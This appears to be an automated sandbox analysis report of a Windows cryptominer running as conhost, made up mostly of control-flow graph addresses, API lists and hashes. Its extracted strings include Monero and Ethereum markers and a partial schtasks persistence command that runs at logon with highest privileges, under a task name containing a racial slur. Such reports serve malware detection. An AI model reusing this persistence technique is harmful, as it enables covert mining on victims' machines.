7ff6b2988a95-7ff6b2988ac7 36->39 42 7ff6b2988ba1-7ff6b2988ba8 38->42 43 7ff6b2988b73-7ff6b2988b9c call 7ff6b29714f0 38->43 39->38 45 7ff6b2988bae-7ff6b2988c68 42->45 46 7ff6b2988c70-7ff6b2988cc9 call 7ff6b2972b00 memset 42->46 43->42 45->46 49 7ff6b2988cf9-7ff6b2988d11 46->49 50 7ff6b2988ccb-7ff6b2988cf4 call 7ff6b29714f0 46->50 52 7ff6b2988d13-7ff6b2988d4c 49->52 53 7ff6b2988d54-7ff6b2988d8e 49->53 50->49 52->53 54 7ff6b2988d90-7ff6b2988db2 call 7ff6b29714f0 53->54 55 7ff6b2988db7-7ff6b2988dbe 53->55 54->55 57 7ff6b2988dc0-7ff6b2988e11 55->57 58 7ff6b2988e19-7ff6b2988e83 call 7ff6b2972b30 call 7ff6b2972b00 memset 55->58 57->58 63 7ff6b2988eb3-7ff6b2988ec2 58->63 64 7ff6b2988e85-7ff6b2988eae call 7ff6b29714f0 58->64 65 7ff6b2988ec8-7ff6b2988f14 63->65 66 7ff6b2989b79-7ff6b2989bd5 63->66 64->63 68 7ff6b2988f16-7ff6b2988f38 call 7ff6b29714f0 65->68 69 7ff6b2988f3d-7ff6b2988f44 65->69 66->8 68->69 71 7ff6b2988f46-7ff6b2988f90 69->71 72 7ff6b2988f98-7ff6b2988ff6 call 7ff6b2972b30 call 7ff6b2972b00 memset 69->72 71->72 77 7ff6b2989026-7ff6b298902d 72->77 78 7ff6b2988ff8-7ff6b2989021 call 7ff6b29714f0 72->78 80 7ff6b298902f-7ff6b2989061 77->80 81 7ff6b2989068-7ff6b29890ce call 7ff6b2972b00 memset 77->81 78->77 80->81 84 7ff6b29890fe-7ff6b2989105 81->84 85 7ff6b29890d0-7ff6b29890f9 call 7ff6b29714f0 81->85 87 7ff6b2989107-7ff6b2989163 84->87 88 7ff6b298916b-7ff6b2989190 call 7ff6b2972b00 call 7ff6b2971ea0 84->88 85->84 87->88 93 7ff6b2989192-7ff6b29891b8 call 7ff6b29714f0 88->93 94 7ff6b29891bd-7ff6b29891c4 88->94 93->94 96 7ff6b29891c6-7ff6b29891e5 94->96 97 7ff6b29891ed-7ff6b2989255 94->97 96->97 98 7ff6b298927e-7ff6b2989285 97->98 99 7ff6b2989257-7ff6b2989279 call 7ff6b29714f0 97->99 101 7ff6b298928b-7ff6b2989325 98->101 102 7ff6b298932d-7ff6b29893b2 call 7ff6b2973010 98->102 99->98 101->102 105 7ff6b29893b8-7ff6b29893ce call 7ff6b2974060 102->105 108 7ff6b29893ef-7ff6b29893f6 105->108 109 7ff6b29893d0-7ff6b29893ea call 7ff6b29714f0 105->109 111 7ff6b2989410-7ff6b298941d _wcsicmp 108->111 112 7ff6b29893f8-7ff6b298940c 108->112 109->108 113 7ff6b29896f0-7ff6b29896f3 call 7ff6b2972a50 111->113 114 7ff6b2989423-7ff6b2989429 111->114 112->111 118 7ff6b29896f8-7ff6b29896fb 113->118 114->113 115 7ff6b298942f-7ff6b2989434 call 7ff6b2973310 114->115 119 7ff6b2989439-7ff6b2989445 115->119 120 7ff6b2989703-7ff6b2989722 memcpy 118->120 119->120 121 7ff6b298944b-7ff6b298944d 119->121 124 7ff6b298974f-7ff6b2989756 120->124 125 7ff6b2989724-7ff6b298974a memcpy call 7ff6b29714f0 120->125 122 7ff6b298944f-7ff6b2989452 121->122 123 7ff6b2989458-7ff6b2989477 memcpy 121->123 122->105 122->123 126 7ff6b29894a8-7ff6b29894af 123->126 127 7ff6b2989479-7ff6b29894a3 memcpy call 7ff6b29714f0 123->127 129 7ff6b29898b5-7ff6b29898c2 call 7ff6b29734f0 124->129 130 7ff6b298975c-7ff6b29898ad 124->130 125->124 132 7ff6b29894b5-7ff6b29895ff 126->132 133 7ff6b2989607-7ff6b2989639 call 7ff6b2972990 126->133 127->126 137 7ff6b29898c4-7ff6b29898c6 129->137 138 7ff6b29898cc-7ff6b29898eb memcpy 129->138 130->129 132->133 142 7ff6b298963f-7ff6b2989649 133->142 143 7ff6b2989b5d-7ff6b2989b74 call 7ff6b29731c0 133->143 137->105 137->138 140 7ff6b298991c-7ff6b2989923 138->140 141 7ff6b29898ed-7ff6b2989917 memcpy call 7ff6b29714f0 138->141 145 7ff6b29899b0-7ff6b29899e7 call 7ff6b2972990 140->145 146 7ff6b2989929 140->146 141->140 148 7ff6b2989680-7ff6b2989687 142->148 149 7ff6b298964b-7ff6b298967b call 7ff6b29714f0 142->149 143->66 160 7ff6b2989b41-7ff6b2989b58 call 7ff6b29731c0 145->160 161 7ff6b29899ed-7ff6b2989a36 145->161 152 7ff6b2989930-7ff6b2989950 146->152 150 7ff6b29896c6-7ff6b29896e6 call 7ff6b2972990 148->150 151 7ff6b2989689-7ff6b29896bf 148->151 149->148 150->105 151->150 152->152 157 7ff6b2989952-7ff6b29899a8 152->157 157->145 160->143 163 7ff6b2989aa2-7ff6b2989aa9 161->163 164 7ff6b2989a38-7ff6b2989a9d call 7ff6b29714f0 161->164 165 7ff6b2989aab-7ff6b2989b14 163->165 166 7ff6b2989b1c-7ff6b2989b37 call 7ff6b2972990 163->166 164->163 165->166 170 7ff6b2989b3c 166->170 170->105
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpywcslen$_wcsicmp
                                                                                        • String ID: %S /run /tn "MINEINEYNIGGA"$%S <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$25.<&$5RK\E$PROGRAMFILES=$PROGRAMFILES=$SYSTEMROOT=$\BaseNamedObjects\jponrsktoliugglc$\BaseNamedObjects\vcrzstnrtuzplmd$\BaseNamedObjects\vcrzstnrtuzplmd$\Google\Libs\$\MINA\m.exe$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MINEINEYNIGGA$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$eth$rce; }$xmr
                                                                                        • API String ID: 9094433-1575734463
                                                                                        • Opcode ID: 70df97cbeb279ce7e503b3156861bbd058356645d432cadd08a0f8bc2809d518
                                                                                        • Instruction ID: 07db7d4ebb8624ca5d8241bef2532af2189fa3486fed02c7137fcf6bf741cba9
                                                                                        • Opcode Fuzzy Hash: 70df97cbeb279ce7e503b3156861bbd058356645d432cadd08a0f8bc2809d518
                                                                                        • Instruction Fuzzy Hash: CFD23E21C1C68399F7137F2FA4423B563E0AF95398F485331DB8C966A3DFAEA1558309
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2971180 Relevance: 12.2, APIs: 8, Instructions: 195sleepstringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 225 7ff6b2971180-7ff6b29711ae 226 7ff6b29711b4-7ff6b29711d1 225->226 227 7ff6b2971450-7ff6b2971453 GetStartupInfoA 225->227 228 7ff6b29711e4-7ff6b29711ef 226->228 229 7ff6b2971460-7ff6b297147a call 7ff6b2986600 227->229 230 7ff6b29711d3-7ff6b29711d6 228->230 231 7ff6b29711f1-7ff6b29711ff 228->231 235 7ff6b29711dc-7ff6b29711e1 Sleep 230->235 236 7ff6b29713f0-7ff6b2971401 230->236 232 7ff6b2971407-7ff6b2971416 call 7ff6b29865f8 231->232 233 7ff6b2971205-7ff6b2971209 231->233 241 7ff6b297141c-7ff6b2971437 _initterm 232->241 242 7ff6b2971224-7ff6b2971226 232->242 237 7ff6b2971480-7ff6b2971499 call 7ff6b2986610 233->237 238 7ff6b297120f-7ff6b297121e 233->238 235->228 236->232 236->233 251 7ff6b297149e-7ff6b29714a6 call 7ff6b2986640 237->251 238->241 238->242 245 7ff6b297122c-7ff6b2971239 241->245 246 7ff6b297143d-7ff6b2971442 241->246 242->245 242->246 248 7ff6b297123b-7ff6b2971243 245->248 249 7ff6b2971247-7ff6b297128f call 7ff6b297d7c0 SetUnhandledExceptionFilter call 7ff6b2986080 call 7ff6b297d540 call 7ff6b2986060 245->249 246->245 248->249 261 7ff6b29712a5-7ff6b29712ab 249->261 262 7ff6b2971291 249->262 264 7ff6b29712ad-7ff6b29712bb 261->264 265 7ff6b2971293-7ff6b2971295 261->265 263 7ff6b29712e7-7ff6b29712ed 262->263 269 7ff6b29712f3-7ff6b2971318 malloc 263->269 270 7ff6b29713d0-7ff6b29713da 263->270 268 7ff6b29712a1 264->268 266 7ff6b2971297-7ff6b297129a 265->266 267 7ff6b29712c0-7ff6b29712c2 265->267 266->267 271 7ff6b297129c 266->271 272 7ff6b29712c4 267->272 273 7ff6b29712d5-7ff6b29712de 267->273 268->261 276 7ff6b297135c-7ff6b2971390 call 7ff6b297d350 call 7ff6b29885d0 269->276 277 7ff6b297131a-7ff6b2971320 269->277 274 7ff6b29713dc 270->274 275 7ff6b29713e1-7ff6b29713e7 270->275 271->268 279 7ff6b29712e0 272->279 273->279 280 7ff6b29712d0-7ff6b29712d3 273->280 274->275 275->269 286 7ff6b2971395-7ff6b29713a3 276->286 281 7ff6b2971325-7ff6b2971355 strlen malloc memcpy 277->281 279->263 280->273 280->279 282 7ff6b2971357 281->282 283 7ff6b2971322 281->283 282->276 283->281 286->251 287 7ff6b29713a9-7ff6b29713b1 286->287 287->229 288 7ff6b29713b7-7ff6b29713c6 287->288
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                                                                        • String ID:
                                                                                        • API String ID: 649803965-0
                                                                                        • Opcode ID: f3100b11892d8d0cbd54530e3a7b5ec9a4463b067f53fdef0f93275959721285
                                                                                        • Instruction ID: bab2944d292321f8d55dbdd71e27a02ac128ccf51f6b28d960814f9250e60af5
                                                                                        • Opcode Fuzzy Hash: f3100b11892d8d0cbd54530e3a7b5ec9a4463b067f53fdef0f93275959721285
                                                                                        • Instruction Fuzzy Hash: 54813A35E1964786EA62BF5FE44177923E1AB55B8CF884035DB0DCB3A3DFACA8548700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2971720 Relevance: 30.1, APIs: 10, Strings: 7, Instructions: 341COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 171 7ff6b2971720-7ff6b2971796 172 7ff6b29717d5-7ff6b29717e7 call 7ff6b29740d5 171->172 175 7ff6b29717e9-7ff6b29717eb 172->175 176 7ff6b29717a0-7ff6b29717cd call 7ff6b2974036 172->176 178 7ff6b2971e30-7ff6b2971e3d 175->178 179 7ff6b29717f1-7ff6b2971824 175->179 176->172 184 7ff6b2971e50-7ff6b2971e70 wcslen 178->184 181 7ff6b2971850-7ff6b297185e 179->181 182 7ff6b2971830-7ff6b2971835 181->182 183 7ff6b2971860-7ff6b2971867 181->183 187 7ff6b297183b-7ff6b297184a 182->187 188 7ff6b2971990-7ff6b29719b1 call 7ff6b2974051 182->188 185 7ff6b2971869-7ff6b29718a1 call 7ff6b29714f0 183->185 186 7ff6b29718a6-7ff6b29718ad 183->186 192 7ff6b2971e80 184->192 185->186 190 7ff6b297190c-7ff6b2971924 wcsncmp 186->190 191 7ff6b29718af-7ff6b2971904 186->191 187->181 187->188 188->192 197 7ff6b29719b7-7ff6b2971a1a call 7ff6b297408a call 7ff6b2973c50 memset 188->197 190->182 194 7ff6b297192a-7ff6b2971988 call 7ff6b297406f 190->194 191->190 194->182 200 7ff6b297198e 194->200 204 7ff6b2971a1c-7ff6b2971a4c call 7ff6b29714f0 197->204 205 7ff6b2971a51-7ff6b2971a58 197->205 200->188 204->205 207 7ff6b2971a5a-7ff6b2971a97 205->207 208 7ff6b2971a9f-7ff6b2971acc wcscpy wcscat wcslen 205->208 207->208 209 7ff6b2971e08-7ff6b2971e1a 208->209 210 7ff6b2971ad2-7ff6b2971af0 wcslen 208->210 211 7ff6b2971af6-7ff6b2971b02 wcslen 209->211 212 7ff6b2971e20-7ff6b2971e2b 209->212 210->211 210->212 213 7ff6b2971b07-7ff6b2971b28 211->213 212->213 213->184 214 7ff6b2971b2e-7ff6b2971e00 wcslen * 2 call 7ff6b2974036 * 2 call 7ff6b297407b call 7ff6b2974051 * 2 213->214
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcsncmp
                                                                                        • String ID: %S <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$X$\??\$`$explorer.exe$xmr
                                                                                        • API String ID: 1181335886-1551201387
                                                                                        • Opcode ID: 63b66c02a5250c84c2a6d9e9a264a3b6df2be75021a1a3a047e22a03b8396f39
                                                                                        • Instruction ID: e018d691d69ac3252983367e4a466dc38ce555ca384d5a7f85aca4bf0a843e2f
                                                                                        • Opcode Fuzzy Hash: 63b66c02a5250c84c2a6d9e9a264a3b6df2be75021a1a3a047e22a03b8396f39
                                                                                        • Instruction Fuzzy Hash: 0A0241229187C285E3229F2EE4403AA73A4FB857A8F444325DBAC976E6DF7DD144C704
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2972990 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcsncmp
                                                                                        • String ID: \BaseNamedObjects\jponrsktoliugglc$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MINEINEYNIGGA$eth
                                                                                        • API String ID: 1181335886-3458631817
                                                                                        • Opcode ID: 5e9a3772ebf4f86a03212d767f80cdeafa828064f7811bd1c2c85207d59958d7
                                                                                        • Instruction ID: eb3d0a3baa01adcacee1111e49547b58b475ef8707eca792d75da822530dd8d1
                                                                                        • Opcode Fuzzy Hash: 5e9a3772ebf4f86a03212d767f80cdeafa828064f7811bd1c2c85207d59958d7
                                                                                        • Instruction Fuzzy Hash: 7401E962B1864241F221E61BE8007EA67A0AB85BD4F544231FF8C57BD6CFBCD146C704
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2972A50 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 39COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcslen
                                                                                        • String ID: 0$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MINEINEYNIGGA$eth
                                                                                        • API String ID: 4088430540-800621946
                                                                                        • Opcode ID: 80bcb33a956bf82a5e617cc6086cba7383c96f5024bdab82dfea3568ee60f294
                                                                                        • Instruction ID: 73930db35c87989dda06c16594c33bd29157cf6e26c2ccb8d1dcf168a49bd0ab
                                                                                        • Opcode Fuzzy Hash: 80bcb33a956bf82a5e617cc6086cba7383c96f5024bdab82dfea3568ee60f294
                                                                                        • Instruction Fuzzy Hash: 0F01D622A1868181E7119B55F85179BB7A0EF84768F640331FB9C4AAE6DF7EC581C740
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00007FF6B299531C Relevance: .0, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7bebafc0cdf615a9abba6b35a8d7a7edf488fde2c98a2736cb098707141f4658
                                                                                        • Instruction ID: b43f0f7a16b9b0ecd39d9aa1bd39ba1b1fc57432894aaa60db99d8ff19574a4b
                                                                                        • Opcode Fuzzy Hash: 7bebafc0cdf615a9abba6b35a8d7a7edf488fde2c98a2736cb098707141f4658
                                                                                        • Instruction Fuzzy Hash: 46F0128BE1EEC389F293516D0C2F25A1FC05B53979F4C427ACBAC822D79DD52D118215
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2973F40 Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
                                                                                        • Instruction ID: b9423e0de1eaf1904f335ad85e55c57491e1066a66b2d5e8bcb9decee6623e27
                                                                                        • Opcode Fuzzy Hash: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
                                                                                        • Instruction Fuzzy Hash: 1CE0B676A08B85818614EB56F48005EBBA4F7D9BC4B504916FECC53B1ACF3CC1A08B40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2986741 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d3ce28f1b288850c35b4b76496f1ee7e5b559d267d7954bb9885d968a0baed50
                                                                                        • Instruction ID: e1e26a2148666b8d64f7924115cf98861ca2ea76020cc3bb4c4de9efc8ecd28d
                                                                                        • Opcode Fuzzy Hash: d3ce28f1b288850c35b4b76496f1ee7e5b559d267d7954bb9885d968a0baed50
                                                                                        • Instruction Fuzzy Hash: 2EA00212C6DD46C4E2011B25DC4617662A8DB06254F046430C11DE54579EACD1524104
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2971EA0 Relevance: 37.2, APIs: 9, Strings: 12, Instructions: 475COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 352 7ff6b2971ea0-7ff6b2971f16 call 7ff6b2986690 355 7ff6b2971f18-7ff6b2971f3e memcpy call 7ff6b29714f0 352->355 356 7ff6b2971f43-7ff6b2971f4a 352->356 355->356 358 7ff6b297208d-7ff6b29720bb wcslen memcpy 356->358 359 7ff6b2971f50-7ff6b2972086 356->359 360 7ff6b29720bd-7ff6b29720e3 memcpy call 7ff6b29714f0 358->360 361 7ff6b29720e8-7ff6b29720ef 358->361 359->358 360->361 363 7ff6b29720f5-7ff6b297222b 361->363 364 7ff6b2972232-7ff6b2972278 361->364 363->364 365 7ff6b297227a-7ff6b29722ca call 7ff6b29714f0 364->365 366 7ff6b29722cf-7ff6b29722d6 364->366 365->366 368 7ff6b297233c-7ff6b2972375 wcslen 366->368 369 7ff6b29722d8-7ff6b2972334 366->369 370 7ff6b29723ca-7ff6b29723d1 368->370 371 7ff6b2972377-7ff6b29723c5 call 7ff6b29714f0 368->371 369->368 373 7ff6b2972437-7ff6b29724a3 call 7ff6b29740f9 370->373 374 7ff6b29723d3-7ff6b297242f 370->374 371->370 377 7ff6b2972929 373->377 378 7ff6b29724a9-7ff6b29724ea 373->378 374->373 380 7ff6b297292b-7ff6b2972969 377->380 379 7ff6b29724f3-7ff6b2972517 call 7ff6b2974108 378->379 383 7ff6b297251d-7ff6b2972589 call 7ff6b29740f9 379->383 384 7ff6b297291f-7ff6b2972924 call 7ff6b2973fe5 379->384 388 7ff6b29724f0 383->388 389 7ff6b297258f-7ff6b29725b6 call 7ff6b2974120 383->389 384->377 388->379 392 7ff6b29725bc-7ff6b29725ce 389->392 393 7ff6b2972910-7ff6b297291a call 7ff6b2973fe5 389->393 395 7ff6b2972610-7ff6b2972617 392->395 396 7ff6b29725d0-7ff6b297260b call 7ff6b29714f0 392->396 393->388 397 7ff6b2972619-7ff6b297267e 395->397 398 7ff6b2972686-7ff6b297269d _wcsnicmp 395->398 396->395 397->398 401 7ff6b297296a-7ff6b2972983 call 7ff6b2973fe5 * 2 398->401 402 7ff6b29726a3-7ff6b29726aa 398->402 401->380 403 7ff6b29726ac-7ff6b29726cf call 7ff6b29714f0 402->403 404 7ff6b29726d4-7ff6b29726db 402->404 403->404 407 7ff6b297270c-7ff6b2972723 _wcsnicmp 404->407 408 7ff6b29726dd-7ff6b2972704 404->408 407->401 410 7ff6b2972729-7ff6b2972730 407->410 408->407 412 7ff6b297275a-7ff6b2972761 410->412 413 7ff6b2972732-7ff6b2972755 call 7ff6b29714f0 410->413 416 7ff6b2972792-7ff6b29727a9 _wcsnicmp 412->416 417 7ff6b2972763-7ff6b297278a 412->417 413->412 416->401 418 7ff6b29727af-7ff6b29727e4 416->418 417->416 419 7ff6b29727e6-7ff6b297284f call 7ff6b29714f0 418->419 420 7ff6b2972854-7ff6b297285b 418->420 419->420 422 7ff6b29728fc-7ff6b297290e wcsstr 420->422 423 7ff6b2972861-7ff6b29728f4 420->423 422->393 422->401 423->422
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
